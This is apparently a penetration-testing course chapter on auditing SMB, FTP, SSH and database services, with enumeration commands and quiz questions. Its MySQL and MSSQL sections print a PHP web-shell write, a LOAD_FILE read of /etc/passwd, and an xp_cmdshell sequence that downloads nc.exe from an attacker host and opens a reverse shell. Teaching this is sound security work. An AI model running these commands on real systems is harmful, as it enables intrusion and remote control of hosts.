4.3 Network Services Auditing: SMB, FTP, SSH & Databases

Key Takeaways

  • Server Message Block (SMB) auditing using enum4linux and smbclient reveals accessible shares, user accounts, password policies, and critical flaws like EternalBlue (MS17-010).

  • Auditing File Transfer Protocol (FTP) instances isolates anonymous login access, directory traversals, and writable web document roots that permit web shell deployment.

  • Secure Shell (SSH) inspection identifies daemon version banners, allowed authentication mechanisms (passwords vs. public keys), and weak encryption ciphers.

  • Database auditing across MySQL (3306) and Microsoft SQL Server (1433) targets default credentials (root, sa), unauthenticated access, and OS command execution via xp_cmdshell.

Last updated: October 2026

Server Message Block (SMB) & Samba Auditing

The Server Message Block (SMB) protocol is a client-server communication protocol used for sharing access to files, printers, serial ports, and miscellaneous network communication endpoints (named pipes and Remote Procedure Calls) across a network. On Unix and Linux systems, SMB is implemented via Samba. Because SMB natively handles authentication, user authorization, and network file storage, misconfigurations or software flaws in SMB services frequently yield high-impact footholds during penetration testing.

SMB Architecture, Ports & Protocol Versions

SMB operates across several transport mechanisms and network ports:

  • Port 137/UDP & 138/UDP: NetBIOS Name Service and NetBIOS Datagram Service, used for legacy local network name resolution and browsing.
  • Port 139/TCP: NetBIOS Session Service, used for legacy NetBIOS-over-TCP SMB communication.
  • Port 445/TCP: Direct-hosted SMB over TCP/IP, standard in all modern Windows and Samba deployments.

The SMB protocol has evolved across several major versions:

  • SMBv1 (CIFS): Legacy version introduced in early Windows operating systems. It lacks modern security features, supports unencrypted communications, and contains severe architectural flaws, such as the buffer overflow in Srv!SrvOs2FeaToNt transactions exploited by EternalBlue (MS17-010 / CVE-2017-0144).
  • SMBv2: Introduced with Windows Vista and Windows Server 2008. Enhanced performance, compound requests, and security.
  • SMBv3: Introduced with Windows 8 and Windows Server 2012. Added end-to-end AES encryption, secure dialect negotiation, and protection against man-in-the-middle attacks.

Automated Auditing with enum4linux

enum4linux is a dedicated Perl wrapper built around Samba client utilities (smbclient, rpcclient, net, and nmblookup) designed to extract information from Windows and Samba hosts. A modern Python-based alternative, enum4linux-ng, provides similar capabilities with JSON export options.

Common enum4linux flags include:

# Run all simple enumeration checks (users, shares, password policy, groups)
enum4linux -a 10.10.10.5

# Enumerate user accounts only
enum4linux -U 10.10.10.5

# Enumerate available file shares
enum4linux -S 10.10.10.5

# Enumerate password policy details
enum4linux -P 10.10.10.5

# Enumerate security groups
enum4linux -G 10.10.10.5

The password policy query (-P) is critical prior to initiating password-guessing attacks. It discloses:

  • Account Lockout Threshold: The number of failed attempts before an account is locked. If the threshold is 3 or 5, running broad password brute-forcing with Hydra will lock out enterprise accounts, disrupting operations.
  • Minimum Password Length: Establishes wordlist filtering boundaries.

Manual Share Enumeration with smbclient

Penetration testers use smbclient to manually inspect shares, test credentials, and download files.

Listing Shares via Anonymous / Null Sessions

A null session occurs when a client connects to an SMB server with an empty username and empty password. To list available shares anonymously:

smbclient -L //10.10.10.5/ -N
# The -L flag lists shares; -N suppresses the password prompt
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN\$          Disk      Remote Admin
	C\$              Disk      Default share
	IPC\$            IPC       Remote IPC
	public          Disk      Public Departmental Files
	backups         Disk      System Backups

In this output:

  • ADMIN\$ and C\$ are default administrative shares accessible only to administrative accounts.
  • IPC\$ (Inter-Process Communication) supports named pipes for RPC communication.
  • public and backups are custom shares. Testers immediately inspect whether public or backups permits unauthenticated access.

Connecting to a Discovered Share

smbclient //10.10.10.5/public -N
# smb: \> dir
# smb: \> get department_notes.txt
# smb: \> exit

If valid credentials (student:Password123) were recovered during prior enumeration:

smbclient //10.10.10.5/backups -U "student%Password123"

Querying Named Pipes with rpcclient & RID Cycling

When IPC\$ allows null session connections, testers can establish an interactive session using rpcclient to query Active Directory or local SAM accounts:

rpcclient -U "" -N 10.10.10.5
# Inside rpcclient prompt:
rpcclient \$> enumdomusers
# user:[Administrator] rid:[0x1f4]
# user:[Guest] rid:[0x1f5]
# user:[jdoe] rid:[0x3e8]
# user:[asmith] rid:[0x3e9]

rpcclient \$> queryuser 0x3e8

If enumdomusers is restricted, testers employ RID Cycling. Because Windows assigns Relative Identifiers (RIDs) sequentially starting at 500 (0x1f4) for the built-in Administrator, 501 for Guest, and 1000 (0x3e8) upward for standard users, an automated loop querying queryuser <RID> extracts user accounts sequentially even when bulk listing is restricted.

Nmap NSE SMB Scripts

Nmap includes several powerful NSE scripts for SMB auditing:

# Enumerate SMB shares and check read/write access
nmap -p 445 --script smb-enum-shares 10.10.10.5

# Enumerate domain and local users via SMB
nmap -p 445 --script smb-enum-users 10.10.10.5

# Audit host for MS17-010 (EternalBlue) vulnerability
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.5

File Transfer Protocol (FTP) Service Auditing

The File Transfer Protocol (FTP) operates on port 21/TCP for control communication and either port 20/TCP (Active mode data) or arbitrary high ports (Passive mode data). FTP transmits credentials and data in cleartext.

Anonymous Authentication Verification

A critical misconfiguration in FTP services is enabling anonymous login, allowing users to authenticate without valid domain or local credentials. Testers verify anonymous access manually:

ftp 10.10.10.5
# Name (10.10.10.5:user): anonymous
# Password: <press Enter or type anonymous@example.com>
# 230 Login successful.
ftp> ls -la

To automate this check across multiple hosts, use the Nmap ftp-anon script:

nmap -p 21 --script ftp-anon 10.10.10.5

High-Impact FTP Misconfigurations

When auditing FTP, testers assess three critical risk factors:

  1. Sensitive File Exposure: Administrators frequently use FTP for automated system backups, staging configuration files, or database dumps. Review file listings for .sql, .bak, .zip, web.config, config.php, or hardcoded API keys.
  2. Directory Traversal: Certain legacy FTP daemons (or misconfigured chroot jails) allow path traversal (cd ../../../etc/), allowing attackers to navigate outside the intended FTP home directory.
  3. Writable Web Root: If the FTP service's root directory is mapped to the web server's document root (such as /var/www/html for Apache or C:\inetpub\wwwroot for IIS), and anonymous users possess write permissions, an attacker can upload a web shell (cmd.php or shell.aspx):
ftp> put webshell.php
# 226 Transfer complete.

The tester then requests http://10.10.10.5/webshell.php?cmd=id in a web browser, converting an anonymous FTP write into immediate remote code execution.

Active vs. Passive FTP Modes

FTP transfers data over a separate channel from control commands:

  • Active Mode (PORT): The client opens a random high port and instructs the server to connect back to it from port 20. If the client is behind a NAT or firewall, inbound connections are dropped, causing file listings to hang.
  • Passive Mode (PASV): The client asks the server to open a listening port, and the client establishes the outbound data connection. When auditing FTP from behind a VPN or NAT, enter passive in the FTP prompt to avoid connection timeouts.

Secure Shell (SSH) Service Auditing

Secure Shell (SSH) operates on port 22/TCP, providing encrypted command-line administration. While modern OpenSSH implementations are resilient against remote exploitation, improper configurations and legacy versions present attack vectors.

Banner Grabbing and OS Fingerprinting

Querying the SSH service banner provides precise information about the OpenSSH version and underlying Linux distribution:

nc -nv 10.10.10.5 22
# Output:
# SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8

This banner confirms:

  • Protocol version 2.0.
  • OpenSSH version 7.2p2.
  • Distribution package Ubuntu-4ubuntu2.8, matching Ubuntu 16.04 LTS (Xenial Xerus).

SSH Protocol 1 vs. Protocol 2

Legacy SSH implementations support Protocol 1 (SSH-1), which suffers from fundamental design weaknesses, including the CRC32 compensation attack (allowing plaintext insertion and session manipulation). Modern standards mandate Protocol 2 (SSH-2). To check whether Protocol 1 is supported:

ssh -1 user@10.10.10.5
# Modern servers respond with: "Protocol major versions differ: 1 vs. 2"

Enumerating Supported Authentication Methods

Knowing whether an SSH server permits password authentication or strictly enforces public key cryptographic authentication (publickey) is critical before planning credential attacks:

# Query authentication methods using SSH verbose mode
ssh -v -o PreferredAuthentications=none 10.10.10.5
# Output snippet:
# debug1: Authentications that can continue: publickey,password

Alternatively, use the Nmap ssh-auth-methods script:

nmap -p 22 --script ssh-auth-methods 10.10.10.5

If the output only permits publickey, online password brute-forcing with Hydra or Metasploit will fail, as the server will reject all password attempts before checking credentials.

Weak Cryptographic Ciphers & Algorithms

To audit whether the SSH daemon supports outdated or weak ciphers (such as 3DES, RC4, or CBC-mode ciphers vulnerable to Sweet32 / CVE-2016-2183):

nmap -p 22 --script ssh2-enum-algos 10.10.10.5

Database Services Auditing: MySQL & Microsoft SQL Server

Database daemons store high-value application data, user credentials, and intellectual property. During security assessments, database services frequently suffer from default administrative credentials, empty passwords, and dangerous stored procedures that allow operating system command execution.

MySQL Auditing (Port 3306/TCP)

MySQL (and its open-source fork MariaDB) defaults to port 3306/TCP.

Default Credentials & Empty Passwords

In development environments and test deployments, the administrative root account is frequently left with an empty or blank password. Testers test authentication directly using the mysql client:

mysql -h 10.10.10.5 -u root -p
# When prompted for password, press Enter directly

To audit across multiple targets, use the Nmap NSE scripts:

nmap -p 3306 --script mysql-empty-password,mysql-info 10.10.10.5

Basic Database Enumeration Queries

Once connected to a MySQL instance, run basic queries to identify system properties and sensitive tables:

-- Query database version and active user
SELECT VERSION(), USER();

-- List all databases on the instance
SHOW DATABASES;

-- Select and query an application database
USE webapp_db;
SHOW TABLES;
SELECT username, password FROM users;

-- Inspect user privileges and hosts permitted to connect
SELECT host, user, authentication_string FROM mysql.user;

File System Read/Write Capabilities

If the MySQL server runs with appropriate file privileges and the secure_file_priv variable is empty, an authenticated user can read sensitive files from the underlying operating system:

-- Read /etc/passwd directly through MySQL
SELECT LOAD_FILE('/etc/passwd');

-- Write a PHP web shell into an accessible web root
SELECT '<?php system(\$_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Microsoft SQL Server (MSSQL) Auditing (Port 1433/TCP)

Microsoft SQL Server operates on port 1433/TCP. The default administrative account is sa (System Administrator).

Automated Auditing with Nmap

# Audit MSSQL instance info and test for empty sa password
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-ntlm-info 10.10.10.5

The ms-sql-ntlm-info script queries the SQL Server authentication endpoint to disclose internal domain names, NetBIOS machine names, and Windows operating system versions.

Remote Command Execution via xp_cmdshell

The most critical exploitation vector on an MSSQL instance is the extended stored procedure xp_cmdshell. When enabled, xp_cmdshell executes operating system commands directly in the context of the SQL Server service account (frequently NT AUTHORITY\NETWORK SERVICE or NT AUTHORITY\SYSTEM).

While disabled by default in modern MSSQL installations, any user with sa or sysadmin privileges can dynamically re-enable it via SQL queries:

-- Step 1: Enable advanced options
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Step 2: Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Step 3: Execute operating system commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.10.14/nc.exe -OutFile C:\Windows\Temp\nc.exe"';
EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe 10.10.10.14 4444 -e cmd.exe';

Executing xp_cmdshell allows an attacker to bridge from database access directly to an interactive command shell on the Windows operating system.

Network Services Auditing Reference Table

Service NameDefault Port(s)Default AccountsKey Enumeration Commands / Scripts
SMB / Samba139/TCP, 445/TCPGuest, Anonymous, Administratorenum4linux -a <ip>; smbclient -L //<ip>/ -N; nmap --script smb-enum-shares -p 445 <ip>
FTP21/TCPanonymous / blank, ftp / blankftp <ip>; nmap --script ftp-anon -p 21 <ip>
SSH22/TCProot, adminnc -nv <ip> 22; ssh -v -o PreferredAuthentications=none <ip>; nmap --script ssh2-enum-algos -p 22 <ip>
MySQL3306/TCProot / blank, root / rootmysql -h <ip> -u root -p; nmap --script mysql-empty-password -p 3306 <ip>
MSSQL1433/TCPsa / blank, sa / Password123nmap --script ms-sql-info,ms-sql-empty-password -p 1433 <ip>; EXEC xp_cmdshell '<cmd>';
PostgreSQL5432/TCPpostgres / blank, postgres / postgrespsql -h <ip> -U postgres; nmap --script pgsql-databases -p 5432 <ip>
Test Your Knowledge

A penetration tester uses smbclient to audit an SMB service on port 445. Which command sequence correctly attempts to list available shares anonymously without prompting for a password?

A

smbclient -W WORKGROUP -U root%root //10.10.10.5/

B

smbclient --download-all //10.10.10.5/IPC$

C

smbclient -L //10.10.10.5/ -N

D

smbclient -A /etc/shadow //10.10.10.5/admin

Test Your Knowledge

An anonymous FTP login audit reveals read and write access to the directory hosting the target organization's public Apache web documents (/var/www/html). How should the tester proceed to achieve remote code execution?

A

Issue the passive command and download all image assets to calculate MD5 hashes.

B

Upload a PHP web shell script via the FTP put command and invoke it by requesting its URL through a web browser.

C

Use the FTP site chmod command to change the permissions of /etc/shadow to 777.

D

Restart the FTP daemon using the quote restart command to force a memory buffer overflow.

Test Your Knowledge

After successfully authenticating to an administrative Microsoft SQL Server (MSSQL) database account on port 1433, which feature can be enabled to execute operating system commands directly on the database host?

A

The MySQL LOAD_FILE() function.

B

The NetBIOS Name Service broadcast protocol.

C

The Samba smbclient file transfer utility.

D

The xp_cmdshell extended stored procedure.

Sections you finish are checked off in the contents.